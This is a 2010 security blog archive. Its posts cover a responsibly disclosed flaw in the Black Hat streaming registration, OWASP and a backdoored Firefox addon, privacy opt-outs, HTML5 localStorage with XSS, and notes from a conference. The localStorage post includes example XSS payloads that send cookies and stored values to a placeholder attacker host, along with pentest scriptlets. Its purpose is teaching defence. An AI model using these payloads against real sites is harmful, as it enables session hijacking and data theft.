Wednesday, July 28, 2010

The Irony - Black Hat Video Stream Hack

Free access to the Black Hat Video Stream? Yep, that was the case. Read on for the whole story.

I was unable to attend Black Hat in person this year. Instead, I decided I would closely monitor Twitter, blogs, and the Black Hat page itself to stay up to date. In the process I noticed the new "Black Hat Uplink" service that would give remote individuals access to streaming Black Hat talks from two select tracks. Great! Now I could watch some talks even though I wasn't there. This sounded perfect, and I began the registration process.

However, during registration I was quickly sidetracked by a few oddities in the design. Long story short, I identified a series of flaws that enabled the creation of an account by providing only an email address (no name, address, phone, etc.), and I was never asked to enter any credit card data. Odd, I thought; perhaps you enter the credit card info upon your first login. The only problem was that I didn't actually have a registration email with a link to the login page. A few select Google searches later, and I ended up on a relatively vanilla-looking login page. I had a username and a key, so let's give it a shot. To my surprise, the login was accepted and I was now sitting in front of the live Black Hat video stream.

This is certainly not the intended outcome of the registration app. I was never prompted to enter my credit card number. Black Hat is charging $395 for access to these streams and would not be pleased to find out that it's possible to create an account for free. Clearly, my non-standard path through the registration app had identified a few key security flaws in the design.

Now, to be fair, Black Hat didn't operate this video service themselves; they used a third party for the video application. But it's still a bit ironic that the largest hacking conference in the world had this security hole in its video streaming service.

Screen Shots

Disclosure

You are hearing about this vulnerability because the identified flaw has already been fixed. The disclosure debate is full of pros and cons, but my approach was to first get in touch with the system owners and give them reasonable time to address the issue. The first problem was figuring out who to talk to. A call to the Black Hat phone number went to voicemail (figures, they're a bit busy) and my emails went unanswered.

I turned to Twitter for an answer. I sent a few select tweets (@_mwc) asking for assistance and used the #blackhatusa tag as well. Within 30 minutes, the company in charge of the video app was messaging me directly. Another 30 minutes and I was on the phone with the person in charge. Not a bad response time.

From there we discussed the issue and I sent over my notes on how to recreate the "free" user. I was assured that this information would go straight to their developers and was of the highest priority. They weren't kidding; within four hours the issue was fixed and deployed live.

Overall Thoughts
  • Even the most security-aware organization (Black Hat) can suffer security breaches. Systems are large and complex, and adding third-party vendor systems can introduce new security weaknesses.
  • Any enterprise leveraging third-party services must either validate the security of those services themselves or review security reports provided by another qualified security organization.
  • Responsible / intelligent disclosure can work. In this case the company was responsive to the issue and eager to address the security concern.
  • Security researchers enjoy working with companies that also care about security. I wanted to give the company a fair chance to fix the issue. The ability to talk to someone within an hour of reporting the issue was very encouraging. Had things not gone so well, I imagine I would be writing a very different blog post at this hour.

The actual vulnerability


A combination of logic flaws and misconfigured systems provided access to a testing login page that could be used with user credentials that were not fully "registered" (e.g. no payment received). I have a more detailed walkthrough of the vulnerability which I may release/present in the future.
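To make the class of bug concrete, here is a purely hypothetical sketch in JavaScript of a login handler with this flaw. None of these names or values come from the actual system; the point is simply that credential validity and payment status are separate checks, and the second one was effectively missing.

// Hypothetical sketch only; all names and data are invented for illustration
var accounts = { 'user1': { key: 'abc123', paymentReceived: false } };

function login(username, key) {
  var account = accounts[username];
  if (!account || account.key !== key) {
    return 'denied: bad credentials';
  }
  // BUG: access is granted on valid credentials alone. The missing check:
  // if (!account.paymentReceived) { return 'denied: registration incomplete'; }
  return 'access granted to stream';
}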

-Michael Coates

Monday, July 26, 2010

BlackHat USA 2010 - Talk Selection

Here is the selection of talks I'm looking forward to seeing. I won't be there in person, so don't worry if you can't seem to find me. One recurring complaint I have with Black Hat is its small focus on web application security. However, if you are looking to completely focus on web app sec, then you should be attending the OWASP conferences anyway.

Day 1 - 1115-1230 Val Smith, Colin Ames & Anthony Lai:
Balancing the Pwn Trade Deficit


Day 1 - 1345-1500 Neil Daswani:
mod_antimalware: A Novel Apache Module for Containing web-based Malware Infections

Day 1 - 1515-1630 Arshan Dabirsiaghi:
JavaSnoop: How to Hack Anything Written in Java
  • I've previewed this tool and it looks awesome. Make sure to check this out.
Day 1 - 1645-1800 Alex Hutton, Allison Miller:
Ushering in the Post-GRC World: Applied Threat Modeling
  • Probably not going to be earth-shattering, but if you aren't doing threat modeling then you should see this and get your act together.
Day 2 - 1000-1100 Nathan Hamiel, Marcin Wielgoszewski:
Constricting the Web: Offensive Python for Web Hackers

Day 2 - 1115-1230 Robert Hansen, Josh Sokol:
HTTPS Can Byte Me


-Michael Coates

Thursday, July 15, 2010

OWASP's (non)role in the Backdoored Firefox Addon

You may have recently read about two addons that were removed from the Mozilla addon store: one due to malicious code that would steal passwords, and the second due to an escalation vulnerability.

A few people have asked me about a statement that was made indicating that this addon was OWASP approved, or was on an OWASP recommended list. The confusion seems to stem from the statement posted with this article.

Hartmann told Netcraft:
"I was giving the OWASP Firefox Security Collection a try, installed a bundle of extensions unknown to me and started to have a look at a friend's online game from a security point of view. I started Burp Suite Pro in parallel to check what additional help I can get from the extensions, and to watch what they are doing."
OWASP does not actually maintain a Firefox Security Collection. Further investigation shows that the following link most likely explains the perceived relationship to OWASP.

In June of 2009, a post was made to the OWASP Phoenix chapter's local mailing list recommending a collection of Firefox addons. All of OWASP's mailing lists are public, and anyone who joins a list can post. The recommendation to try out this collection was not made by OWASP but instead by a member of the mailing list looking to share information that he had found helpful:
https://lists.owasp.org/pipermail/owasp-phoenix/2009-June/000090.html

Later, in June of 2010, the malicious addon made its way into that collection and was ultimately discovered by Johann-Peter Hartmann, who reported it to Mozilla, where it was quickly acted on.

Kudos to Johann for discovering the issue and promptly reporting it for resolution.  Hopefully this clears up the confusion regarding OWASP and the addon.

For any questions regarding the two addons, I encourage you to visit the official blog post and respond with comments there.




-Michael Coates

Tuesday, July 13, 2010

Automatic Opt-In Privacy Policy Changes - Your Privacy is Important to Us

Privacy continues to be an increasingly important discussion as the online and physical worlds merge. The data that a user has online effectively tells the life story of an individual, down to where they are at a given moment, what they will do next, and even who they will be meeting.

One of the many questions that must be discussed with privacy is the appropriate method of handling privacy policy changes. This was, of course, a huge issue with the recent Facebook policy changes. However, let's look at a different example.

I recently received a notice from Verizon Wireless that started with the following:

Customer Proprietary Network Information Notice
Your privacy is important to us.
The document went on to clearly explain that Verizon wanted to provide my data to its affiliates, agents, and parent companies for the purpose of finding out how to "better serve your telecommunication needs". The document explained what data would be included and provided an easy way to opt out of the sharing. So far so good, right?

Well, the problem I have is this: I need to opt out. If someone wants to take or share something that is yours, they should have to ask you for permission, not the other way around. Simply sending a letter, which may not even reach the user, and indicating that the user has to take action to prevent a company from using their data seems wrong.

This line of thinking could never be applied to material goods. I could not send my neighbor a letter indicating that I was going to take his car and share it with my friends unless he opted out. Nor could I send Verizon a letter indicating I would no longer be paying my bills unless they opted out of my "no more bill paying" plan.

Clearly we can easily dismiss these ideas as far-fetched. But that is mostly because they involve a physical object with clear ownership, or something with an easy-to-understand monetary value (e.g. a monthly bill). By that logic, the only difference between my examples and data privacy is that we haven't clearly articulated the value of our data and privacy.

But our data does have value, and companies are more than happy to farm this data for their profits. Until we clearly define the value of our data and establish that we have the right to control it, big companies will continue this practice of easily accessing and sharing our data under the guise of "your privacy is important to us".



-Michael Coates

Monday, July 12, 2010

HTML5, Local Storage, and XSS

A nice new feature of HTML5 is local storage. Briefly, this is a client-side storage option that can be easily accessed via JavaScript. The benefit of local storage over other client-side storage options is that it allows more storage space than the alternatives (cookies, Flash objects, etc.). In addition, unlike cookies, the data is not automatically appended to every request by the browser. This is a nice benefit for those attempting to minimize data transmission between the client and server.
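For reference, the API itself is just a few calls (standard HTML5, nothing application-specific here):

// Store a value; it persists across browser restarts until explicitly removed
localStorage.setItem('prefs', JSON.stringify({ theme: 'dark' }));
// Read it back later (getItem returns null if the key doesn't exist)
var prefs = JSON.parse(localStorage.getItem('prefs'));
// Remove a single item
localStorage.removeItem('prefs');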

However, there are a few security considerations that should be evaluated before completely jumping on board with local storage. 

XSS and Local Storage

A popular target of XSS attacks is the session identifier, along with any sensitive data stored client side. Just like a session ID stored within a cookie, a session ID within local storage can be easily stolen by an attacker.
Example XSS to steal session ID from cookie
<script>document.write("<img src='http://attackersite.com?cookie="+document.cookie+"'>");</script>

Example XSS to steal session ID from local storage
<script>document.write("<img src='http://attackersite.com?cookie="+localStorage.getItem('foo')+"'>");</script>

The syntax is easy: access localStorage using getItem and reference the variable name holding the data. The only real difference is that the attacker would need to inspect the client-side JavaScript to pick out the correct variable names to use.
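In fact, the attacker doesn't even need to guess names, since localStorage is enumerable. A minimal sketch (attackersite.com is a placeholder, as above):

<script>
var loot = [];
for (var i = 0; i < localStorage.length; i++) {
  var key = localStorage.key(i);                    // nth key name
  loot.push(key + '=' + localStorage.getItem(key));
}
// exfiltrate everything in a single image request
new Image().src = 'http://attackersite.com/?data=' + encodeURIComponent(loot.join('&'));
</script>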

HTTPOnly and Local Storage

Another problem with using local storage for session IDs is the inability to apply the HTTPOnly flag that we use with cookies. The HTTPOnly flag instructs the browser not to allow JavaScript access to the cookie. This is a great additional layer of defense to prevent an XSS attack from stealing the user's session (of course, lots of other damage is still possible via XSS). Since local storage is intended to be accessed via JavaScript, the idea of HTTPOnly is not compatible with its design.
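For comparison, protecting a cookie-based session takes a couple of attributes on the Set-Cookie response header (the cookie name and value here are just examples):

Set-Cookie: SESSIONID=d9a1b2c3; Secure; HttpOnly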

Notes for penetration testing:
Proof of concept XSS with local storage:
<script>alert(localStorage.getItem('foo'))</script>

Get a Local Storage Value via URL scriptlet:
javascript:alert(localStorage.getItem('fooName'));

Set a Local Storage Value via URL scriptlet:
javascript:localStorage.setItem('fooName','barValue');

Set a Local Storage Value with JSON via URL scriptlet:
javascript:localStorage.setItem('fooName', JSON.stringify({data1:'a', data2:'b', data3:'c'}));

Get Number of Local Storage Objects via URL scriptlet:
javascript:alert(localStorage.length);

Clearing all Local Storage associated with site:
javascript:localStorage.clear()

Final Thoughts on Local Storage and Security
1. Don't use local storage for session identifiers. Stick with cookies and use the HTTPOnly and Secure flags.
2. If cookies won't work for some reason, then use session storage, which is cleared when the user closes the browser window (a quick example follows this list).
3. Be cautious about storing sensitive data in local storage. Just like any other client-side storage option, this data can be viewed and modified by the user.
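For point 2, sessionStorage shares the exact same API as localStorage; the only difference is its lifetime:

// Same setItem/getItem API as localStorage, but scoped to the browsing session
sessionStorage.setItem('wizardStep', '3');
sessionStorage.getItem('wizardStep'); // "3" until the tab/window is closed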



-Michael Coates

Thursday, July 1, 2010

Notes from OWASP Bay Area Security Summit

I attended the OWASP Bay Area Security Summit today and wanted to share some notes from the talks.

Drive By Downloads - How to Avoid Getting A Cap Popped in your App - Neil Daswani, Co-founder, Dasient
- Lots of information in this talk. However, the portion on dynamic identification and quarantine of malicious scripts was very interesting. Dasient created mod_antimalware, which analyzes dynamic content within a webpage to determine whether remotely linked content is malicious. If the remotely linked content is malicious, the module strips the include or src link to that content in real time. The idea is pretty interesting, and I can see it being applicable to help stop malicious JavaScript delivered via ads. Neil mentioned he'll be talking more about this at Black Hat.
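As a rough illustration of that stripping step, here is my own back-of-the-napkin sketch in JavaScript (the real mod_antimalware is an Apache module; this is just the concept, with isMalicious standing in for the actual detection logic):

// Drop script includes whose src points to a known-malicious host
function stripMalicious(html, isMalicious) {
  return html.replace(/<script[^>]+src=["']([^"']+)["'][^>]*>\s*<\/script>/gi,
    function (tag, src) { return isMalicious(src) ? '' : tag; });
}

// Example: strip anything served from evil.example.com (placeholder host)
var page = '<div><script src="http://evil.example.com/x.js"><\/script></div>';
var cleaned = stripMalicious(page, function (src) {
  return src.indexOf('evil.example.com') !== -1;
});
// cleaned === '<div></div>'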

Building Secure Web Applications In a Cloud Services Environment - Misha Logvinov, VP of Online Operations, IronKey and Alex Bello
This was a talk on securing the SDLC that provided a good overall look at the SDLC and how security should be integrated into each phase. Several OWASP resources were mentioned that can assist in securing various portions of the SDLC, including ESAPI, ASVS, the Top 10, and OpenSAMM. The talk also touched on cloud services, but didn't dive into much depth there. During Q&A, someone asked how to verify or test a cloud service provider's security. Misha's answer was to ask for proof in the following forms: SAS 70, ISO 27001, or third-party penetration test reports. This is a challenging issue and one that will need to be addressed as cloud services grow. I think the ideas provided by Misha are a good starting point for the security conversation between the client and the cloud services provider.

Cloudy with a Chance of Hack - Lars Ewe, CTO and VP of Engineering, Cenzic

- Lars reviewed several statistics from Cenzic's trend reports on web application security. The data clearly showed, to no one's surprise, that there are still a large number of vulnerabilities in most web applications. While the data was interesting, I did have some disagreements with the methodology. For example, Information Leakage was reported as the most prevalent vulnerability within the applications studied (Q3-Q4 report, pg 10) and as being present in 93% of all applications in the study (pg 11). This percentage seemed a bit high, and we soon found out why. Information Leakage includes the standard things like detailed error messages, but also HTML comments (pg 15). This explains why the results seemed off: any website with an HTML comment was dinged for Information Leakage. The other statistic that I questioned was CSRF. The report states that CSRF is an issue in only 14% of applications (pg 11). This is an odd result because CSRF has been widely discussed as a tricky issue to test for automatically. With that in mind, I'm confused how the report detected some CSRF vulnerabilities but not the quantity we would expect. In my experience nearly every site has CSRF flaws, so I'd expect a percentage between 85% and 90%.

These discrepancies made me think twice about the overall statistics and conclusions of the report. However, I shouldn't derail the issue too much. Any study will have its limitations and biases, and even if the methods used to collect the data are slightly off, consistent methods mean the trends over time still provide some value. Either way, the overall point is clear: we still have a lot of work to do to clean up our applications.

Two other presentations were in the summit lineup. Unfortunately, I did not have enough time in my schedule to catch them.
 
Application Security Deployment Tradeoffs - Anoop Reddy, Senior Manager, Products, Citrix


MashUp SSL - Extending SSL for Security Mashups - Siddharth Bajaj, Principal Engineer, Verisign

In the Bay Area and interested in OWASP? Sign up on the mailing list for event notifications.


-Michael Coates